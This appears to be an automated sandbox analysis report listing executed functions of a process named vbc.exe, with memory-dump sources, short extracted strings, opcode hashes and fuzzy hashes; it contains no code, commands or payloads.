                                                                                                Analysis Process: vbc.exe PID: 1616 Parent PID: 2492 vbc.exeCOMMON

                                                                                                Executed Functions

                                                                                                Function 001D22C2, Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: `!Gm$`!Gm$`!Gm
                                                                                                • API String ID: 0-1277780060
                                                                                                • Opcode ID: b39eff89bec5c81179934c6cd2d6c0450bfc4e3fda9bb2f326a89eb948cbeff9
                                                                                                • Instruction ID: 716d16c3241b25356751260f0c90840c3dee8c86cf7d6a98df1166135ca606d1
                                                                                                • Opcode Fuzzy Hash: b39eff89bec5c81179934c6cd2d6c0450bfc4e3fda9bb2f326a89eb948cbeff9
                                                                                                • Instruction Fuzzy Hash: 2F812474E04218DFDB18DFA9D844AEEBBB2FF89300F10806AD41AA7394DB345A85DF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740FE4, Relevance: 3.8, Strings: 3, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.$5
                                                                                                • API String ID: 0-1977295215
                                                                                                • Opcode ID: aad6d7f895bd0bf24d2b9cc2680da38da52ebdac759977fe91780cda3c70ca73
                                                                                                • Instruction ID: b9fffc554c4d595d484e7ae2b01f9c201fcba614d84885851f96d484a18fdd1e
                                                                                                • Opcode Fuzzy Hash: aad6d7f895bd0bf24d2b9cc2680da38da52ebdac759977fe91780cda3c70ca73
                                                                                                • Instruction Fuzzy Hash: 5221D374A01628CFDB20DFA4DD88BE9B7B5AB45302F1094EAD648A7251D7788EC8CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001D2A98, Relevance: 3.5, Strings: 2, Instructions: 1016COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TVGm$3/d
                                                                                                • API String ID: 0-964053342
                                                                                                • Opcode ID: ecac7308b91b7ba84b1d70f04ec387cae6a6b51ee070aa5a55ea1c23300efdb7
                                                                                                • Instruction ID: f63e4513390e831731977462f43d2caef5e07d285b0ab70b3984fa591f952d77
                                                                                                • Opcode Fuzzy Hash: ecac7308b91b7ba84b1d70f04ec387cae6a6b51ee070aa5a55ea1c23300efdb7
                                                                                                • Instruction Fuzzy Hash: 75B2D175E00628CFDB64CF69C984AD9BBB2BF89304F1581E9D519AB325DB319E81CF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740942, Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$($.$3$4$5
                                                                                                • API String ID: 0-3501779667
                                                                                                • Opcode ID: c824f97eca60cff71d7273d45c5a49faf3d4bb6f6c3b3023690cbeed92c50288
                                                                                                • Instruction ID: ef8bcbc7d55ac87347f4470340dc4eb958de77b39a07adbcffd2b8a469315b89
                                                                                                • Opcode Fuzzy Hash: c824f97eca60cff71d7273d45c5a49faf3d4bb6f6c3b3023690cbeed92c50288
                                                                                                • Instruction Fuzzy Hash: A441FF74A016288FDB20CF64CD98BEDBBB1BB49301F1084EAD249A7251DB749EC4CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007404A0, Relevance: 6.4, Strings: 5, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$%$($,$.
                                                                                                • API String ID: 0-4093807741
                                                                                                • Opcode ID: f9883f4be469f0438c9b67dd5aec534488500ec32938f4ba98075249c9f2a715
                                                                                                • Instruction ID: 310d47932013ffca3449c2f2099570942fda06709ac4e459fb82923ead4ad3f2
                                                                                                • Opcode Fuzzy Hash: f9883f4be469f0438c9b67dd5aec534488500ec32938f4ba98075249c9f2a715
                                                                                                • Instruction Fuzzy Hash: 0C61BBB4A01228CFDB60DF64CD88BDDBBB1AB19301F1084EAD549A3291DB759EC9CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740824, Relevance: 6.3, Strings: 5, Instructions: 82COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$-$.$5$:
                                                                                                • API String ID: 0-635508465
                                                                                                • Opcode ID: 1812e49d75f076b802c5ff19ef756716af23b09942f7646e46cabe8a257edeec
                                                                                                • Instruction ID: 11000b09f4e25c013e751d9b6cf71c61a10ff7a8c9bff82884faba73de166f22
                                                                                                • Opcode Fuzzy Hash: 1812e49d75f076b802c5ff19ef756716af23b09942f7646e46cabe8a257edeec
                                                                                                • Instruction Fuzzy Hash: 3941CB74A016288FDB20CFA8CD88BD9BBF1BB49305F1484EAD548A7251DB349EC5CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740AA4, Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$*$.$7$9
                                                                                                • API String ID: 0-2060168619
                                                                                                • Opcode ID: 3719cef23df68986d57aa0e81fe146a15e84b2843e76ac76f7c705ccbbfa7a89
                                                                                                • Instruction ID: 24aebdfff49175f39ca57c9341c6d0040f57205a44893968fbd8a8950178ca1f
                                                                                                • Opcode Fuzzy Hash: 3719cef23df68986d57aa0e81fe146a15e84b2843e76ac76f7c705ccbbfa7a89
                                                                                                • Instruction Fuzzy Hash: 9C41D178A11628CFDB20DF64DD88BE9BBB1BB49301F1084EAD549A7290D7749EC8CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740357, Relevance: 6.3, Strings: 5, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$($.$3$4
                                                                                                • API String ID: 0-2498521315
                                                                                                • Opcode ID: 7905afbd6c596d9abd2b7129c2e505424a934783288e21e238ae496b1b3263c7
                                                                                                • Instruction ID: 5e1265648034f70b3866878e0767f7e7798c93d54609c8f7080c6cbc1d6e12e7
                                                                                                • Opcode Fuzzy Hash: 7905afbd6c596d9abd2b7129c2e505424a934783288e21e238ae496b1b3263c7
                                                                                                • Instruction Fuzzy Hash: F431BD74A016288BDB20CF64CD88BD9BBB1BB09301F1084EAD149A7291DB749EC8CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740D3C, Relevance: 6.3, Strings: 5, Instructions: 65COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$($.$3$4
                                                                                                • API String ID: 0-2498521315
                                                                                                • Opcode ID: 719cfebea9fe7442652666f357cd54102079e2454c015d14da6063b2c4bdcef3
                                                                                                • Instruction ID: 3f0cb8c7b22e055396a88510087049d2d226df45551bd3d9ffc8bbaa5d0c1d20
                                                                                                • Opcode Fuzzy Hash: 719cfebea9fe7442652666f357cd54102079e2454c015d14da6063b2c4bdcef3
                                                                                                • Instruction Fuzzy Hash: 8631E074E012298BDB24CF64CD88BEDBBB2AB49305F1084E9D149A7251DB749EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007406F5, Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "$%$,$.
                                                                                                • API String ID: 0-1667988251
                                                                                                • Opcode ID: 38d117c03dd9716fee9c02874db3447015ef558cb9a05e8af9e8ac62ae6aacc9
                                                                                                • Instruction ID: 0ce6439cfe8cd3b8c0f6561c2b11c0acc1398d6f08e7cb2ae73df7ecae2e73c0
                                                                                                • Opcode Fuzzy Hash: 38d117c03dd9716fee9c02874db3447015ef558cb9a05e8af9e8ac62ae6aacc9
                                                                                                • Instruction Fuzzy Hash: E041ADB4E012288FDB60DF64DC88BDEBBB1AB59301F1084EAD549A7290DB759EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740DEB, Relevance: 5.1, Strings: 4, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.$0$2
                                                                                                • API String ID: 0-3491853023
                                                                                                • Opcode ID: e090f7882f437465e7fca9b0717009303ecbad359772c1aace2c8f0ba20cd528
                                                                                                • Instruction ID: 9aa05ee2e6692130f2eaad7901881cc092e96ba68bacdef2e3472059f433af58
                                                                                                • Opcode Fuzzy Hash: e090f7882f437465e7fca9b0717009303ecbad359772c1aace2c8f0ba20cd528
                                                                                                • Instruction Fuzzy Hash: DD31D074A00228CFDB20DF64DC88BD9BBB1AB19305F1084EAD549A3251D7749FC8CF81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740A8A, Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !$%$.$5
                                                                                                • API String ID: 0-3680664580
                                                                                                • Opcode ID: 200be51984b21c5cf5b5e18c6d657f07640841d64e4561eb6ee894c2cdb18b62
                                                                                                • Instruction ID: f790a8d9a80702aeef8f34bca76c348561c34fbe85b326a9da97d9d0bc1d5fa3
                                                                                                • Opcode Fuzzy Hash: 200be51984b21c5cf5b5e18c6d657f07640841d64e4561eb6ee894c2cdb18b62
                                                                                                • Instruction Fuzzy Hash: 6A11E674A05628CFDB20CFA4CD88BA9BBF5BB55301F2480DAD648A7251C3789EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740FC7, Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.$1$2
                                                                                                • API String ID: 0-3521321192
                                                                                                • Opcode ID: 59323c9a7f05154470962aca4b9de89ba07df3a69db19232ea01245c51549f51
                                                                                                • Instruction ID: 9af28872a70dda67e9262ab2032d90bdc76ce17d6b668571140aff3109141a82
                                                                                                • Opcode Fuzzy Hash: 59323c9a7f05154470962aca4b9de89ba07df3a69db19232ea01245c51549f51
                                                                                                • Instruction Fuzzy Hash: 3F11C279A15628CFDB20CF64DD88BA9BBB1BB55301F1084DAD649A3251D3788EC8CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740B29, Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$&$.
                                                                                                • API String ID: 0-4054694203
                                                                                                • Opcode ID: 376a63b2cb676742db6fe415abd138808a737b8b05c2cf19b07981d5138f9f10
                                                                                                • Instruction ID: 18f9530d69415e50db7079fcb9b2f118495c5eb69b66ce980a40033082801ce8
                                                                                                • Opcode Fuzzy Hash: 376a63b2cb676742db6fe415abd138808a737b8b05c2cf19b07981d5138f9f10
                                                                                                • Instruction Fuzzy Hash: 7131EFB9A052288FDB60CFA4CC88BD9BBB1BB49301F2481DAD548A7241D7749EC5CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740F18, Relevance: 3.8, Strings: 3, Instructions: 67COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$+$.
                                                                                                • API String ID: 0-4185205352
                                                                                                • Opcode ID: 3ed979662504e4cd4000c8564bb530517f93a7466ed7a1acff7c0d0ce928f4cf
                                                                                                • Instruction ID: f0e5653155d121f67f66eb88ddc3475fbd608bae012707c825c3d2087d145a5b
                                                                                                • Opcode Fuzzy Hash: 3ed979662504e4cd4000c8564bb530517f93a7466ed7a1acff7c0d0ce928f4cf
                                                                                                • Instruction Fuzzy Hash: 2631C4B4A116288FDF20CF64DC88BD9BBB1BB49301F1084D9D648A7251D7749EC5DF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740235, Relevance: 3.8, Strings: 3, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.$9
                                                                                                • API String ID: 0-2087546180
                                                                                                • Opcode ID: d67f1163d39085e3eeb19e988cc91a28e91bedac46378ee3642d41a525113565
                                                                                                • Instruction ID: 35b1c55c0e41c2907035df6a06225ddf99dace55cc9c1053f8062b0a9bb1f928
                                                                                                • Opcode Fuzzy Hash: d67f1163d39085e3eeb19e988cc91a28e91bedac46378ee3642d41a525113565
                                                                                                • Instruction Fuzzy Hash: 5231D378A11228CFDB20DF64DC88BE9BBB1BB49311F1085EAD549A72A0D7749EC4CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007406A9, Relevance: 3.8, Strings: 3, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.$9
                                                                                                • API String ID: 0-2087546180
                                                                                                • Opcode ID: 7dba3fcfe9f04aeaba7a92ab13c2e47b289fdf03def7fa51810714dbed35b407
                                                                                                • Instruction ID: d2b95defba79c7f244389c440b17da9db6366bccefc74d9a658327e29461b27e
                                                                                                • Opcode Fuzzy Hash: 7dba3fcfe9f04aeaba7a92ab13c2e47b289fdf03def7fa51810714dbed35b407
                                                                                                • Instruction Fuzzy Hash: 8221D478A00628CFDB20CF64DD887D9BBB1BB18311F1085DAD549A7290D7748EC4CF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740CC7, Relevance: 3.8, Strings: 3, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $$%$.
                                                                                                • API String ID: 0-3465227986
                                                                                                • Opcode ID: ac6e34681f7a8d5e0c59604ebb93676da2a7c7566ce8fac5296b9237fb7898bc
                                                                                                • Instruction ID: 93ecc46de77f0bc8bb2efa3f9de2f5794ce7cc98bb4a8ee4344c1f7fd6c25992
                                                                                                • Opcode Fuzzy Hash: ac6e34681f7a8d5e0c59604ebb93676da2a7c7566ce8fac5296b9237fb7898bc
                                                                                                • Instruction Fuzzy Hash: 0A210074A02628CFDB208FA4DD887E9BBB1BB49311F1090DAD20CA3251D7788EC8CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0074020A, Relevance: 3.8, Strings: 3, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.$9
                                                                                                • API String ID: 0-2087546180
                                                                                                • Opcode ID: ab82f170d97e8c1aa13a0cd93e26759072784c3b71f4009b748965e5f85f3da5
                                                                                                • Instruction ID: b6094780332ec6abfca0bef7f765f3ff63292c798f3d1b2774b493b06622c796
                                                                                                • Opcode Fuzzy Hash: ab82f170d97e8c1aa13a0cd93e26759072784c3b71f4009b748965e5f85f3da5
                                                                                                • Instruction Fuzzy Hash: 1F21F278A01628CFDB20DF64DC88BE9BBB2BB49311F1085EAD149A7291D7749EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007402D1, Relevance: 3.8, Strings: 3, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.$<
                                                                                                • API String ID: 0-201824715
                                                                                                • Opcode ID: c84c817c01df58b6172a9efd937f8060816b516541356bbb82c08d3ecbf20860
                                                                                                • Instruction ID: 0671d6faa00a72eb862a858d644d8d1c2f7cf410b1e8f5a6758d7b870fe885fa
                                                                                                • Opcode Fuzzy Hash: c84c817c01df58b6172a9efd937f8060816b516541356bbb82c08d3ecbf20860
                                                                                                • Instruction Fuzzy Hash: 4021B2B9A107288FDB21CF64DC88BE9BBB1BB08301F1084EAD549A3251D7748EC4DF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740586, Relevance: 3.8, Strings: 3, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$&$.
                                                                                                • API String ID: 0-4054694203
                                                                                                • Opcode ID: 51dca8c26f282ba51d3963dfa2978b730b173f7934f840b6082de175c5010e56
                                                                                                • Instruction ID: 3660b93908bae323da47d0126b0c6abd1db4c4f60abc31ce5d5f90a21d3a4e69
                                                                                                • Opcode Fuzzy Hash: 51dca8c26f282ba51d3963dfa2978b730b173f7934f840b6082de175c5010e56
                                                                                                • Instruction Fuzzy Hash: BB11D478A01628CFDB60CFA4DC88B99BBB1BB45305F24C1D9D648A7251D7748EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0074099D, Relevance: 3.8, Strings: 3, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$+$.
                                                                                                • API String ID: 0-4185205352
                                                                                                • Opcode ID: 86f7f248c28fc00442eab295279bb05824ad16476eff6c6852ed1254e8374aaf
                                                                                                • Instruction ID: ec782a2b3208b829629cb7b7616aa5951ea647b2a70f29169a733ae597dcfd3a
                                                                                                • Opcode Fuzzy Hash: 86f7f248c28fc00442eab295279bb05824ad16476eff6c6852ed1254e8374aaf
                                                                                                • Instruction Fuzzy Hash: 5C11DF78A00628CFDB60CF64DC88BA9BBB1BB48301F2080EAD548A3251D7748EC8DF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740326, Relevance: 3.8, Strings: 3, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$'$.
                                                                                                • API String ID: 0-4033860364
                                                                                                • Opcode ID: 0f48a568855eaada32b45224431a8a13c10044e2a3772732ca129a4bdeecc257
                                                                                                • Instruction ID: 52007de0b3475cd24cc4d0e64ffda41b3f10f6eed2469c55ef7d1a117831a575
                                                                                                • Opcode Fuzzy Hash: 0f48a568855eaada32b45224431a8a13c10044e2a3772732ca129a4bdeecc257
                                                                                                • Instruction Fuzzy Hash: 2C11B078A01628CFDB60DF64DD98B99BBB2AB59301F2080DAD548A7251D7748EC4CF49
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0074017A, Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .$8
                                                                                                • API String ID: 0-343468992
                                                                                                • Opcode ID: 4c7eb5e9962e80db70b46821731f5e3f136b03904e590ec2a51ad31cf60c468b
                                                                                                • Instruction ID: 62777d0374e7fca51a193321dcee0654feeefdbe6646f1f64248ecbf779ab545
                                                                                                • Opcode Fuzzy Hash: 4c7eb5e9962e80db70b46821731f5e3f136b03904e590ec2a51ad31cf60c468b
                                                                                                • Instruction Fuzzy Hash: A731F474A00629DFEB60CF64CD89BD9BBB1AB18301F1084DAD649A7280D7749EC5DF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007404BD, Relevance: 2.6, Strings: 2, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 89b76c39049867c661dbf8a9e8ab52717e81d32902d24279257b98e4c453c54c
                                                                                                • Instruction ID: 639f750a963c28247d42736aef65e24c14c3a510ef024d9cc716425682a58637
                                                                                                • Opcode Fuzzy Hash: 89b76c39049867c661dbf8a9e8ab52717e81d32902d24279257b98e4c453c54c
                                                                                                • Instruction Fuzzy Hash: B321EF78A00228CFDB60CFA4CC88BDDBBB2AB59300F2080DAD149A3291D7359EC5CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0074063F, Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 4d8e4a179d8bf3efe30e5884a772785fdc04ea92bc52d6c5ec337ba9127d8891
                                                                                                • Instruction ID: e4c3956a4f796986c2971433d4e02b5219020bedc022db2d21e9a0991e319b31
                                                                                                • Opcode Fuzzy Hash: 4d8e4a179d8bf3efe30e5884a772785fdc04ea92bc52d6c5ec337ba9127d8891
                                                                                                • Instruction Fuzzy Hash: 8B21D079A00628CFDB20CF64CD88BA9BBB1BB49301F1080DAD548A7251D7749EC5CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007405DE, Relevance: 2.5, Strings: 2, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: a696a4c2022635a09807c415bf2363f7513ecb1a60006025bfa5b21e395920c2
                                                                                                • Instruction ID: add87c25698747bd853475276eb81eff90336552e00ce8965d5740d6ad9bb144
                                                                                                • Opcode Fuzzy Hash: a696a4c2022635a09807c415bf2363f7513ecb1a60006025bfa5b21e395920c2
                                                                                                • Instruction Fuzzy Hash: 4721CBB8A006288FDB60CF64DC88BEDBBB1BB58301F1085EAD549A3251E7749EC4CF44
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007403CC, Relevance: 2.5, Strings: 2, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 2e72f4cbea713f225516c5b67e53a5cba19e2ce301cd84bfa532c370d5c9bda2
                                                                                                • Instruction ID: 067f40ec5b47fd1df307c8643e76f19cc9fd81fd4ae67fd8d901948b9d802c35
                                                                                                • Opcode Fuzzy Hash: 2e72f4cbea713f225516c5b67e53a5cba19e2ce301cd84bfa532c370d5c9bda2
                                                                                                • Instruction Fuzzy Hash: 0121B8B8A04628CFDB60CF64DD88BD9BBB2AB58301F1085EAD54DA3251D7749EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740451, Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 423780124d4cd7984dcb401927a3fd54639a82268a181d39d7cbfea249d4e684
                                                                                                • Instruction ID: c3a11bad2aba0a390fe743ae18260784bc9aa340b0ae8f9f25b7ee578763b615
                                                                                                • Opcode Fuzzy Hash: 423780124d4cd7984dcb401927a3fd54639a82268a181d39d7cbfea249d4e684
                                                                                                • Instruction Fuzzy Hash: 1F119DB9A147288FDB60CF64DC88BD9BBB1BB55301F1084EAD549A3251D7788EC8CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007405A3, Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: d4a26daf159e0cfb9b64a2272d5ee33544ca0981da5ffacf248a4b690309fadf
                                                                                                • Instruction ID: 5bf326741a7ef61519dc174fc7c3d848a81abbb8c4ff0fe0621d466625820a52
                                                                                                • Opcode Fuzzy Hash: d4a26daf159e0cfb9b64a2272d5ee33544ca0981da5ffacf248a4b690309fadf
                                                                                                • Instruction Fuzzy Hash: BF11E0B8A00728CFDB20CF60DC88BD9BBB2AB59301F1085DAD548A3250D7748EC4DF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740555, Relevance: 2.5, Strings: 2, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 2bebb976c3d7efb93eb892e74072ecf8c3848c4adadbe3041c853ad81d1aba4d
